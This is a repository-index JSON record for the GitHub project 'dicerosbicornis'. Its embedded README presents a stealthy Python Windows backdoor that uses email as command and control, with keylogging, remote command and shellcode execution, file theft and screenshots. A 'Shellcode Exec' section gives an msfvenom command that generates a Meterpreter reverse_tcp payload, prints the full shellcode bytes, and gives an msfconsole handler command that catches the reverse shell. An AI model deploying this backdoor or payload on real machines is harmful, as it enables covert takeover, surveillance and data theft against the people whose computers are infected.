{"id":18054311,"url":"https://github.com/maldevel/dicerosbicornis","last_synced_at":"2025-04-10T23:03:25.907Z","repository":{"id":68239546,"uuid":"100624700","full_name":"maldevel/dicerosbicornis","owner":"maldevel","description":"A fully featured Windows backdoor that uses email as a C\u0026C server","archived":false,"fork":false,"pushed_at":"2017-08-19T12:54:38.000Z","size":33,"stargazers_count":16,"open_issues_count":0,"forks_count":11,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-04-10T23:03:20.900Z","etag":null,"topics":["backdoor","email","pentest","python","shellcode","windows","windows-backdoor"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/maldevel.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2017-08-17T16:37:51.000Z","updated_at":"2025-02-07T12:09:23.000Z","dependencies_parsed_at":"2023-06-02T18:00:43.391Z","dependency_job_id":null,"html_url":"https://github.com/maldevel/dicerosbicornis","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/maldevel%2Fdicerosbicornis","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/maldevel%2Fdicerosbicornis/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/maldevel%2Fdicerosbicornis/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/maldevel%2Fdicerosbicornis/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/maldevel","download_url":"https://codeload.github.com/maldevel/dicerosbicornis/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248312142,"owners_count":21082638,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","email","pentest","python","shellcode","windows","windows-backdoor"],"created_at":"2024-10-31T00:10:38.545Z","updated_at":"2025-04-10T23:03:25.887Z","avatar_url":"https://github.com/maldevel.png","language":"Python","funding_links":[],"categories":["\u003ca id=\"1e53961ca8fc592a588e18a5f1519078\"\u003e\u003c/a\u003e其他"],"sub_categories":["\u003ca id=\"77cdae7f8911e93ff055f270ef9bf562\"\u003e\u003c/a\u003e工具"],"readme":"DicerosBicornis\n====\n\nA stealthy Python based Windows backdoor that uses email as a command and control server.\n\nRequirements\n=====\n\n* Python 2.x\n* PyCrypto module\n* WMI module\n* Enum34 module\n* Netifaces module\n* pypiwin32 module\n\nFeatures\n=====\n\n* Encrypted transportation messages (AES) + SHA256 hashing\n* Generate computer unique id using system information/characteristics (SHA256 hash)\n* Job IDs are random SHA256 hashes\n* Retrieve system information\n* Retrieve Geolocation information (City, Country, lat, long, etc..)\n* Retrieve running processes/system services/system users/devices (hardware)\n* Retrieve list of clients\n* Execute system command\n* Download files from client \n* Upload files to client\n* Execute shellcode\n* Take screenshot\n* Lock client's screen \n* Keylogger\n* Lock remote computer's screen\n* Shutdown/Restart remote computer\n* Log off current user\n* Download file from the WEB\n* Visit website\n* Show message box to user\n* Ability to change check-in time\n* Ability to add jitter to check-in time to reduce predictability \n\nSetup\n=====\n\nFor this to work you need:\n- A mail account\n\nDownload/Installation\n====\n\n* https://sourceforge.net/projects/pywin32\n* git clone https://github.com/maldevel/dicerosbicornis\n* pip install -r requirements.txt\n\nContents\n=====\n\n- ```dicerosbicornis.py``` a script that's used to enumerate and issue commands to available clients\n- ```client.py``` the actual backdoor to deploy\n\nYou're probably going to want to compile ```client.py``` into an executable using [Pyinstaller](https://github.com/pyinstaller/pyinstaller)\n\n**Note: It's recommended you compile client.py using a 32bit Python installation**\n\nUsage\n=====\n```\nusage: dicerosbicornis.py [-h] [-v] [-id ID] [-jobid JOBID] [-list | -info]\n                          [-cmd CMD | -visitwebsite URL | -message TEXT TITLE | -tasks | -services | -users | -devices | -download PATH | -download-fromurl URL | -upload SRC DST | -exec-shellcode FILE | -screenshot | -lock-screen | -shutdown | -restart | -logoff | -force-checkin | -start-keylogger | -stop-keylogger | -email-checkin CHECK | -jitter jit]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -v, --version         show program's version number and exit\n  -id ID                Client to target\n  -jobid JOBID          Job id to retrieve\n\n  -list                 List available clients\n  -info                 Retrieve info on specified client\n\nCommands:\n  Commands to execute on a client\n\n  -cmd CMD              Execute a system command\n  -visitwebsite URL     Visit website\n  -message TEXT TITLE   Show message to user\n  -tasks                Retrieve running processes\n  -services             Retrieve system services\n  -users                Retrieve system users\n  -devices              Retrieve devices(Hardware)\n  -download PATH        Download a file from a clients system\n  -download-fromurl URL\n                        Download a file from the web\n  -upload SRC DST       Upload a file to the clients system\n  -exec-shellcode FILE  Execute supplied shellcode on a client\n  -screenshot           Take a screenshot\n  -lock-screen          Lock the clients screen\n  -shutdown             Shutdown remote computer\n  -restart              Restart remote computer\n  -logoff               Log off current remote user\n  -force-checkin        Force a check in\n  -start-keylogger      Start keylogger\n  -stop-keylogger       Stop keylogger\n  -email-checkin CHECK  Seconds to wait before checking for new commands\n  -jitter jit           Percentage of Jitter\n```\n\nShellcode Exec\n=====\n\n```\n$ ./msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform Windows EXITFUNC=thread LPORT=4444 LHOST=x.x.x.x -f python\n\nNo encoder or badchars specified, outputting raw payload\nPayload size: 354 bytes\nbuf =  \"\"\nbuf += \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\nbuf += \"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0\\xb7\"\nbuf += \"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\nbuf += \"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\nbuf += \"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\nbuf += \"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\nbuf += \"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\nbuf += \"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\nbuf += \"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\nbuf += \"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\nbuf += \"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\"\nbuf += \"\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\"\nbuf += \"\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\"\nbuf += \"\\xff\\xd5\\x6a\\x05\\x68\\xac\\x10\\x99\\x01\\x68\\x02\\x00\\x11\"\nbuf += \"\\x5c\\x89\\xe6\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\"\nbuf += \"\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\"\nbuf += \"\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0a\\xff\\x4e\\x08\\x75\\xec\"\nbuf += \"\\xe8\\x61\\x00\\x00\\x00\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\"\nbuf += \"\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7e\\x36\\x8b\\x36\\x6a\"\nbuf += \"\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\\xa4\\x53\"\nbuf += \"\\xe5\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\"\nbuf += \"\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7d\\x22\\x58\\x68\\x00\\x40\"\nbuf += \"\\x00\\x00\\x6a\\x00\\x50\\x68\\x0b\\x2f\\x0f\\x30\\xff\\xd5\\x57\"\nbuf += \"\\x68\\x75\\x6e\\x4d\\x61\\xff\\xd5\\x5e\\x5e\\xff\\x0c\\x24\\xe9\"\nbuf += \"\\x71\\xff\\xff\\xff\\x01\\xc3\\x29\\xc6\\x75\\xc7\\xc3\\xbb\\xe0\"\nbuf += \"\\x1d\\x2a\\x0a\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\"\nbuf += \"\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\"\nbuf += \"\\x53\\xff\\xd5\"\n```\n\nGet rid of everything except for the shellcode and stick it in a file:\n\n```\n$ cat shell.txt \n\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\\xff\\xd5\\x6a\\x05\\x68\\xac\\x10\\x99\\x01\\x68\\x02\\x00\\x11\\x5c\\x89\\xe6\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0a\\xff\\x4e\\x08\\x75\\xec\\xe8\\x61\\x00\\x00\\x00\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7e\\x36\\x8b\\x36\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7d\\x22\\x58\\x68\\x00\\x40\\x00\\x00\\x6a\\x00\\x50\\x68\\x0b\\x2f\\x0f\\x30\\xff\\xd5\\x57\\x68\\x75\\x6e\\x4d\\x61\\xff\\xd5\\x5e\\x5e\\xff\\x0c\\x24\\xe9\\x71\\xff\\xff\\xff\\x01\\xc3\\x29\\xc6\\x75\\xc7\\xc3\\xbb\\xe0\\x1d\\x2a\\x0a\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\\xff\\xd5\n```\nrun the console\n\n```\n ./msfconsole -x \"use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST x.x.x.x; run\"\n ```\n ","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmaldevel%2Fdicerosbicornis","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmaldevel%2Fdicerosbicornis","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmaldevel%2Fdicerosbicornis/lists"}